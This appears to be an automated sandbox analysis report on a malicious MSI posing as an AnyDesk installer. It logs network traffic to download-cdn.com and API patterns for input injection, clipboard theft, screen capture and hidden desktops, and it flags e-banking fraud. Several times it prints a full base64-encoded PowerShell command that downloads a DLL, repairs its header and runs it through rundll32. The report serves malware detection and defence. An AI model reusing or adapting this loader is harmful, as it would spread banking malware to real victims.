Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown

DNS traffic detected: queries for: download-cdn.com

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_100017A0 InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,VirtualAlloc,InternetReadFile,VirtualAlloc,VirtualFree,InternetReadFile,VirtualFree,VirtualFree,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

7_2_100017A0

Source: global traffic	HTTP traffic detected: GET /download.php?f=Ldrp.dll&from=AnydeskSetup_26b30163.msi HTTP/1.1Host: download-cdn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pload/26b30163 HTTP/1.1Host: download-cdn.comCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.123

Source: unknown

HTTPS traffic detected: 152.89.196.75:443 -> 192.168.2.4:49696 version: TLS 1.2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_04A05CE0 htons,socket,connect,closesocket,send,send,GetKeyboardLayoutList,send,CreateThread,WindowFromPoint,WindowFromPoint,GetParent,SendMessageTimeoutA,GetWindowRect,GetWindowLongA,GetParent,ScreenToClient,MoveWindow,SetFocus,PostMessageA,GetWindowLongA,GetParent,GetWindowLongA,GetParent,IsWindow,GetWindowPlacement,PostMessageW,PostMessageW,WindowFromPoint,GetWindowThreadProcessId,GetKeyboardLayout,ActivateKeyboardLayout,VkKeyScanExA,GetKeyboardState,ToAscii,ScreenToClient,ChildWindowFromPoint,ScreenToClient,ChildWindowFromPoint,PostMessageA,WindowFromPoint,

7_2_04A05CE0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_04A04BA2 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,

7_2_04A04BA2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_04A04E78 LocalAlloc,OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,lstrlenW,GlobalUnlock,CloseClipboard,

7_2_04A04E78

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_04A0A850 GetDC,GetDC,CreateCompatibleDC,SelectObject,SelectObject,CreateCompatibleBitmap,SelectObject,SelectObject,CreateSolidBrush,SelectObject,Rectangle,GetDC,BitBlt,GetTopWindow,GetWindow,GetWindow,IsWindowVisible,GetWindowRect,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,PrintWindow,BitBlt,DeleteObject,DeleteDC,GetWindow,GetClassNameW,lstrcmpW,GetWindowLongA,SetWindowLongA,GetWindow,SelectObject,Rectangle,VirtualFree,VirtualFree,VirtualFree,VirtualAlloc,GetDC,VirtualAlloc,GetDC,VirtualAlloc,GetDC,VirtualAlloc,GetDIBits,

7_2_04A0A850

E-Banking Fraud

Malicious encrypted Powershell command line found

Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI5344.tmp "C:\Windows\Installer\MSI5344.tmp" /DontWait /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI5344.tmp "C:\Windows\Installer\MSI5344.tmp" /DontWait /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_04A0ACE0 OpenDesktopW,CreateDesktopW,SetThreadDesktop,

7_2_04A0ACE0

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\435f8fae.dat

Jump to dropped file

Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF6D5EC0	3_2_00007FF7AF6D5EC0
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF7150CC	3_2_00007FF7AF7150CC
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF720018	3_2_00007FF7AF720018
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF6EC8D0	3_2_00007FF7AF6EC8D0
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF71A864	3_2_00007FF7AF71A864
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF6E209C	3_2_00007FF7AF6E209C
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF718FF8	3_2_00007FF7AF718FF8
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF6F870C	3_2_00007FF7AF6F870C
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF720DB4	3_2_00007FF7AF720DB4
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF6E5574	3_2_00007FF7AF6E5574
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF7155C4	3_2_00007FF7AF7155C4
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF725604	3_2_00007FF7AF725604
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF6E6606	3_2_00007FF7AF6E6606
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF711578	3_2_00007FF7AF711578
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF6E7C4C	3_2_00007FF7AF6E7C4C
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF7174E0	3_2_00007FF7AF7174E0
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF6E4444	3_2_00007FF7AF6E4444
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF713424	3_2_00007FF7AF713424
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF6E3330	3_2_00007FF7AF6E3330
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF6D7B30	3_2_00007FF7AF6D7B30
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF6E93FC	3_2_00007FF7AF6E93FC
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF725388	3_2_00007FF7AF725388
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF6DCA70	3_2_00007FF7AF6DCA70
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF6F7A64	3_2_00007FF7AF6F7A64
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF7111A4	3_2_00007FF7AF7111A4
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF71194C	3_2_00007FF7AF71194C
Source: C:\Windows\Installer\MSI5344.tmp	Code function: 3_2_00007FF7AF71B994	3_2_00007FF7AF71B994
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF815F80D81	4_2_00007FF815F80D81
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF815F80DAA	4_2_00007FF815F80DAA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF815F80CA8	4_2_00007FF815F80CA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100026B0	7_2_100026B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04A09AC0	7_2_04A09AC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04A0DF70	7_2_04A0DF70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04A0B978	7_2_04A0B978
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04A0D54F	7_2_04A0D54F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00FC9AC0	9_2_00FC9AC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00FCB978	9_2_00FCB978
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00FCDF70	9_2_00FCDF70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00FCD54F	9_2_00FCD54F

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI4755.tmp

Source: AnydeskSetup_26b30163.msi	Binary or memory string: OriginalFilenameviewer.exeF vs AnydeskSetup_26b30163.msi
Source: AnydeskSetup_26b30163.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs AnydeskSetup_26b30163.msi
Source: AnydeskSetup_26b30163.msi	Binary or memory string: OriginalFilenameSoftwareDetector.dllF vs AnydeskSetup_26b30163.msi

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\AnydeskSetup_26b30163.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 98DB8D4E6DAAAA17E94E76B65ACF188B
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI5344.tmp "C:\Windows\Installer\MSI5344.tmp" /DontWait /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAG